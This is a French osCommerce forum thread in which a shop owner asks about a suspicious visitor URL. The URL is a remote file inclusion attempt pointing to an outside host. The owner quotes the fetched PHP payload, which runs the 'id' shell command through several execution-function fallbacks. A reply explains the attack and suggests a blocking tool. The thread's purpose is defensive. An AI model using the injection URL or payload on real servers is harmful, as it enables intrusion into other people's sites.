Aide - Recherche - Membres - Calendrier
Version complète : URL inquiétante ?
Forum osCommerce-fr > Adapter OsCommerce MS2 > Sécurité - Mises à jour
pom-kanel
Bonjour à tous,

Il y a quelques instants, je faisais un tour pour voir qui était en ligne sur ma boutique. La première ligne correspondait à une ip japonaise, et l'url indiquée était la suivante :
/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.***.my/img/ec.txt??

Ca ne m'inspire rien de bon. Je suis tout de suite suivi le lien qui ne donne rien d'autre que ma page d'accueil, mais si je vais à l'adresse suivante : h**p://***.daftarwarisan.***.my/img/ec.txt?? je tombe sur le code suivant :
Code
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;


Le site en question semble être un site lié au gouvernement de la Malaisie...

Ai-je quelque chose à craindre d'après vous?

Cordialement
Gnidhal
C'est une tentative de hack via une injection de code.
Si tu es avec une MS2 standard, il n'y a rien à craindre.
Si tu es avec une creload, ça ne présage rien de bon.
D'ailleurs, si tu as un antivirus à jour qui protège ton navigateur web, la lecture de cette adresse (que j'ai tronqué en enlevant le gov) renvoie une alerte.

Installe crawltrack pour bloquer ce genre d'attaque. ça marche assez bien si tu suis bien les conseils d'installation des développeurs.
pom-kanel
Bonjour et merci,

Je tourne effectivement avec une MS2, mais largement modifiée depuis, j'espère que tout ira bien.

Merci pour crawltrack, je vais m'y attaquer tout de suite.
Cordialement
Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'informations, la mise en page et les images, veuillez cliquer ici.
Invision Power Board © 2001-2013 Invision Power Services, Inc.